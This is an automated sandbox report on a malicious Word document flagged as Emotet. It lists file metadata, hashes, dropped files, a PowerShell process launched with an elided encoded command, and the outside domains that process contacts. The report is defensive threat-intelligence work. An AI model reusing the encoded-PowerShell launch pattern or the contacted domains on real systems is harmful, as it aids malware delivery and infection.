Field | Value
---|---
File name: | FA_UHKR3AKU52TC.doc
Full analysis: | https://app.any.run/tasks/806a4680-2cb3-443c-847b-ca7078f84918
Verdict: | Malicious activity
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.
Analysis date: | September 18, 2019, 19:47:42
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: | —
MIME: | application/msword
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: programming Industrial, Shoes & Health, Subject: Lakes, Author: Kylie Corwin, Comments: Avon Norwegian Krone Directives, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: | 22213F95806256BA5C345CA08F231903
SHA1: | 21DD3159F107D72F227E3F23FEBFC4C4EAA3ECFD
SHA256: | 4745993C2538522D79EFC7406292F2E9429EFD8AB52A81F7919173D3E3E1BDCC
SSDEEP: | 6144:VV1qmTgpbxDj2kCUSfp40sTPLkIq7NSU4jJntATfD2BlPi7+:VV1qmTgpbxDj2kCUSfp40s/Xq7NSU4VV
Extension | Identified type
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
Title: | programming Industrial, Shoes & Health
Subject: | Lakes
Author: | Kylie Corwin
Keywords: | -
Comments: | Avon Norwegian Krone Directives
Template: | Normal.dotm
LastModifiedBy: | -
RevisionNumber: | 1
Software: | Microsoft Office Word
TotalEditTime: | -
CreateDate: | 2019:09:18 14:32:00
ModifyDate: | 2019:09:18 14:32:00
Pages: | 1
Words: | 95
Characters: | 547
Security: | None
CodePage: | Windows Latin 1 (Western European)
Company: | Kshlerin Group
Lines: | 4
Paragraphs: | 1
CharCountWithSpaces: | 641
AppVersion: | 16
ScaleCrop: | No
LinksUpToDate: | No
SharedDoc: | No
HyperlinksChanged: | No
TitleOfParts: | -
HeadingPairs: | -
Manager: | Parker
CompObjUserTypeLen: | 32
CompObjUserType: | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2852 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA_UHKR3AKU52TC.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
2388 | powershell -encod [encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8BE9.tmp.cvr | — | — | —
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31D4F07F.wmf | wmf | 2353260EC885C3A98A6C89D22AFF1248 | E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5870F01.wmf | wmf | 3A29DA903BD58B73E1F0C10CA64CA98C | AE1164B8174C32D82293B27ED54BFFB64193EDC7C6E04DAF066A776E70727402
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_UHKR3AKU52TC.doc | pgc | AD07A4ECE72E0BC47901B3F8E30EFE75 | 8B03FCA649588C4A94450DFBED441BFC6C90B94E3F7D6FB9CFE2D8F1DB39F19D
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70E1CDE5.wmf | wmf | 597872C11ED292C466AB6B41973A1DC9 | 504B99306569BEF0BAB66452F7FAA1F4C019337591DA88D20F507001DC2D8928
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1EEF290E.wmf | wmf | B26CB82ACEAAD19B625500BC0EB11F2D | B97B45B771BD83756AE5E75091B31EC709DDC1FA19EE65F87BBCE88A86C1BE3F
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48409E3B.wmf | wmf | B419C90F42F3A4C5D5601F2F63E4E4C0 | 06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BCC884C.wmf | wmf | 7720404BA288E079BFB0402748402071 | 84A6A1ABC3152F804B842CB283B940E47F1C1A43BAE1444987872999141FAE0E
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC5C9458.wmf | wmf | AD8C29ABEC4D3542383070B72BF5188E | 5938672DD2C5AAE2573FAE1FF5952BC9109E2421D91097DBDF6188196B5E6D69
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEDDB2A2.wmf | wmf | 0B4F037A5A19E16270CB61C7FA8DD94A | F8FD5C3D38CE93C1D02DD91F4483F5CAD5B5B406B145C8588BF5B9839E362A94
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
2388 | powershell.exe | 103.221.222.16:443 | tankhoi.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
2388 | powershell.exe | 213.186.33.186:443 | hotel-bristol.lu | OVH SAS | FR | suspicious |
2388 | powershell.exe | 104.248.24.81:443 | www.supercrystal.am | — | US | unknown |
2388 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
2388 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
Domain | IP | Reputation
---|---|---
www.patrickglobalusa.com | — | malicious
pipizhanzhang.com | — | unknown
tankhoi.vn | — | unknown
www.supercrystal.am | — | unknown
hotel-bristol.lu | — | suspicious